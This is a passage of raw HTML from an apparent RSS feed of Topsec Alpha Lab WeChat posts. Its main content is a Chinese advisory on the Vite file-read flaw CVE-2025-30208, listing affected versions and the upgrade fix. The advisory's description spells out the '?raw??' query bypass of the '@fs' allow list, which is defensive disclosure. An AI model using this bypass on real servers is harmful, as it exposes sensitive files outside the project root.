inline-block;vertical-align: middle;width: auto;align-self: center;flex: 0 0 auto;min-width: 5%;max-width: 100%;height: auto;box-sizing: border-box;"><div style="margin: 0px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;width: 45px;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img wx_img_placeholder_mini" data-ratio="0.32037037037037036" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="503502685" src="https://wechat2rss.xlab.app/img-proxy/?k=a2d7238e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FdSWSuPicfjTdwt2DlajkpRsYsDrYUtoqazyU8GAcP8lyGafSuEEicMHkmUBmgvszIib6YJzI9Djn9ibIHqTlor3wm9kgW8ibXibhz7ce7B3stFlmI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%23imgIndex%3D7"/></p></div></div></div></div><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);line-height: 1.75;" data-pm-slice="0 0 []" mp-original-font-size="16" mp-original-line-height="1.75"><div style="letter-spacing: 1px;box-sizing: border-box;" data-pm-slice="10 5 [&#39;para&#39;,{&#39;tagName&#39;:&#39;section&#39;,&#39;attributes&#39;:{&#39;style&#39;:&#39;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);&#39;,&#39;data-pm-slice&#39;:&#39;0 0 []&#39;},&#39;namespaceURI&#39;:&#39;http://www.w3.org/1999/xhtml&#39;}]" mp-original-font-size="16" mp-original-line-height="1.75"><div style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-color: rgb(255, 255, 255);color: rgb(89, 87, 87);font-size: 15px;letter-spacing: 0.578px;box-sizing: border-box !important;overflow-wrap: break-word !important;" mp-original-font-size="15" mp-original-line-height="1.75"><div data-style="white-space: normal; font-family: -apple-system, BlinkMacSystemFont, &#39;Helvetica Neue&#39;, &#39;PingFang SC&#39;, &#39;Hiragino Sans GB&#39;, &#39;Microsoft YaHei UI&#39;, &#39;Microsoft YaHei&#39;, Arial, sans-serif; letter-spacing: 0.544px; background-color: rgb(255, 255, 255);" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 16px;letter-spacing: 0.544px;color: rgb(62, 62, 62);font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mp-original-font-size="16" mp-original-line-height="1.75"><div powered-by="xiumi.us" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;font-size: 15px;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mp-original-font-size="15" mp-original-line-height="1.75"><div data-support="96编辑器" data-style-id="28416" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(62, 62, 62);font-family: -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mp-original-font-size="15" mp-original-line-height="1.75"><p style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;color: rgb(89, 87, 87);letter-spacing: 1px;visibility: visible;box-sizing: border-box !important;overflow-wrap: break-word !important;" mp-original-font-size="15" mp-original-line-height="1.75" nodeleaf=""><mp-common-profile class="js_uneditable custom_select_card mp_profile_iframe js_wx_tap_highlight" data-pluginname="mpprofile" data-nickname="天融信" data-alias="TopsecPioneer" data-index="0" data-from="0" data-headimg="http://mmbiz.qpic.cn/mmbiz_png/nJmicCz2NYxPiazyASKVba57ReFHFEqicHGum3FRLQza0a8624LIibogluysp3HQgcztqd1HUchOdIDwak46dKT1IQ/300?wx_fmt=png&amp;wxfrom=19" data-signature="天融信（002212）作为中国网络安全与智算云解决方案提供商，助力各行业实现数字化、智能化转型升级。" data-id="MzA3OTMxNTcxNA==" data-is_biz_ban="0" data-origin_num="3" data-biz_account_status="0" data-service_type="1" data-verify_status="2"></mp-common-profile></p></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=13135529&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496695%26idx%3D1%26sn%3D1b64600108d07907afda1cdcdd5384e1">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 13 Mar 2026 19:15:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于Vite任意文件读取漏洞(CVE-2025-30208)的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496690&amp;idx=1&amp;sn=6010f3a0a91bb3e0546c20a0e004fdd1</link>
      <description>3月26日,天融信阿尔法实验室监测到Vite 官方披露了一个任意文件读取漏洞(CVE-2025-30208)，目前该漏洞POC已公开，建议受影响用户尽快升级。</description>
      <content:encoded><![CDATA[<p>
<span>天融信应急响应</span> <span>2025-03-26 23:21</span> <span style="display: inline-block;">北京</span>
</p>

<p>3月26日,天融信阿尔法实验室监测到Vite 官方披露了一个任意文件读取漏洞(CVE-2025-30208)，目前该漏洞POC已公开，建议受影响用户尽快升级。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=da8cd56d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dGON17pcaZ7wrLgX3dT1mW5jQxibV0TnXonX9qXs7H2ia8JPgibR9UuiaeGTv5j6o80mLicwslyfjLlEpg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="text-align: center;" nodeleaf=""><img data-imgfileid="100013039" class="rich_pages wxw-img" data-ratio="0.49117647058823527" data-s="300,640" data-type="jpeg" data-w="680" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a92c93b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dGON17pcaZ7wrLgX3dT1mW5Dt6NfxLic3TG09QOZfNCMRHicyrI6waAvXZ7N10T2pic1HzWCuWyCdcsg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></section><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x00 背景介绍</span></span></strong><span leaf=""><br/></span></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span leaf=""><br/></span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span leaf="">3月26日</span><span style="font-size: 14px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(53, 53, 53);font-family: \&#34;Helvetica Neue\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei\&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 14px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">，天融信阿尔法实验室监测到Vite 官方披露了一个任意文件读取漏洞(CVE-2025-30208)，目前该漏洞POC已公开，建议受影响用户尽快升级。</span></span></span></p><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x01 漏洞描述</span></span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span leaf=""><br/></span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf="">Vite 是一个现代前端构建工具，它旨在提供快速的开发体验，尤其适合现代 JavaScript 框架（如 Vue）,凭借其快速的启动时间和流畅的开发体验，成为越来越多开发者的首选。</span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf="">该漏洞因为`@fs` 拒绝访问 Vite 服务允许列表之外的文件。在 URL 中添加 `?raw??` 或 `?import&amp;raw??` 可绕过此限制并返回文件内容（如果存在）。之所以存在此绕过，是因为尾随分隔符（例如 `?`）在多个地方被删除，但在查询字符串正则表达式中没有考虑到这一点。</span><span leaf="">导致攻击者可以绕过保护机制，非法访问项目根目录外的敏感文件。</span></p><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x02 漏洞编号</span></span></strong></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">CVE-2025-30208</span></span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x03 漏洞等级</span></span></strong><span leaf=""><br/></span></section><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">高危</span></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x04 受影响版本</span></span></strong></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 0px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">6.2.0 &lt;= Vite &lt;= 6.2.2</span></span></section><section style="white-space: normal;margin-top: 0px;margin-bottom: 0px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">6.1.0 &lt;= Vite &lt;= 6.1.1</span></span></section><section style="white-space: normal;margin-top: 0px;margin-bottom: 0px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">6.0.0 &lt;= Vite &lt;= 6.0.11</span></span></section><section style="white-space: normal;margin-top: 0px;margin-bottom: 0px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">5.0.0 &lt;= Vite &lt;= 5.4.14</span></span></section><section style="white-space: normal;margin-top: 0px;margin-bottom: 0px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">Vite &lt;= 4.5.9</span></span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x05 修复建议</span></span></strong></section><hr style="color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;"><span leaf="">目前官方已发布安全更新，建议用户尽快升级至最新版本。</span><span leaf=""><br/></span><span leaf="">下载地址：</span></span><span leaf=""><br/></span><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">h</span><span leaf="">ttps://github.com/vitejs/vite/releases</span></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x06 声明</span></span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span leaf="">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span><span leaf=""><br/></span></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;"><span leaf="">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span></span><span leaf=""><br/></span></p></section></section></section></section><section style="margin-bottom: 0px;"><section><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><span leaf=""><br/></span></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><span leaf=""><br/></span></p></section><section style="margin: -20px 0% 5px;"><section style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;" nodeleaf=""><img data-imgfileid="100013023" class="rich_pages wxw-img" data-ratio="0.06041666666666667" data-type="png" data-w="480" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></section></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;" nodeleaf=""><img data-imgfileid="100013022" class="rich_pages wxw-img" data-ratio="1" data-type="jpeg" data-w="344" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">天融信</span></span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">阿尔法实验室</span></span></p></section></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;"><span leaf="">长按二维码关注我们</span></span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496690">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3abf7e2d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496690%26idx%3D1%26sn%3D6010f3a0a91bb3e0546c20a0e004fdd1%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 26 Mar 2025 23:21:00 +0800</pubDate>
    </item>
    <item>
      <title>天融信发布《大模型组件漏洞与应用威胁安全研究报告》​</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496682&amp;idx=1&amp;sn=e4643091842bb9fe7d576a85fe1e129a</link>
      <description>点击文末“阅读原文”，即可获取完整报告！</description>
      <content:encoded><![CDATA[<p>
<span>阿尔法实验室</span> <span>2025-03-17 13:39</span> <span style="display: inline-block;">北京</span>
</p>

<p>点击文末“阅读原文”，即可获取完整报告！</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=cbafd6f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dEu80A90NT3tYmj5EZ1sxE3HHIh3NRYviaSbN2DBibRO4RVVFWZBStWze3xPOiaQdG6y6CjFPSFtichvw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-backh="107" data-backw="578" data-galleryid="" data-imgfileid="503482600" data-ratio="0.18518518518518517" style="width: 100%;height: auto !important;" data-type="gif" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b34b9fc6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FnJmicCz2NYxNibMqIOfXMnZxbVBPBGKu3pficMjqFslyVdhUYhSozJ0egjyKoezIaK9qEyYy6ttzMv3T5Kiasiae7icg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p><section style="font-size: 15px;color: rgb(89, 87, 87);letter-spacing: 1px;line-height: 1.75;"><section style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin-top: 10px;margin-bottom: 10px;"><section style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 0 0 auto;min-width: 5%;height: auto;padding-top: 1px;padding-bottom: 1px;"><section style="justify-content: center;display: flex;flex-flow: row;"><section style="display: inline-block;width: auto;vertical-align: top;align-self: flex-start;flex: 0 0 auto;min-width: 5%;height: auto;border-radius: 5px;overflow: hidden;padding: 3px;background-image: linear-gradient(-90deg, rgba(226, 72, 60, 0.376) 0%, rgb(226, 72, 60) 100%);"><section style=""><section style="display: inline-block;width: 50px;height: 50px;vertical-align: top;overflow: hidden;background-color: rgb(255, 255, 255);border-radius: 4px;"><svg viewBox="0 0 1 1" style="float:left;line-height:0;width:0;vertical-align:top;"></svg></section></section></section></section></section><section style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;height: auto;margin: 20px -20px 10px -35px;z-index: 1;background-color: rgba(255, 255, 255, 0);"><section style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;align-self: flex-start;background-color: rgb(240, 239, 239);padding: 20px;border-radius: 10px;overflow: hidden;"><section style="text-align: justify;width: 100%;"><p>近年来，大模型呈现出蓬勃发展的态势，为人工智能行业的技术进步源源不断地注入创新活力。然而，在大模型开发者致力于提升模型效果、拓展模型能力的同时，大模型的安全性问题也不容忽视，亟待给予高度关注。</p></section></section></section><section style="display: inline-block;vertical-align: bottom;width: auto;min-width: 5%;flex: 0 0 auto;height: auto;align-self: flex-end;"><section style="justify-content: center;display: flex;flex-flow: row;"><section style="display: inline-block;width: auto;vertical-align: top;align-self: flex-start;flex: 0 0 auto;min-width: 5%;height: auto;border-radius: 5px;overflow: hidden;padding: 3px;background-image: linear-gradient(-90deg, rgba(226, 72, 60, 0.376) 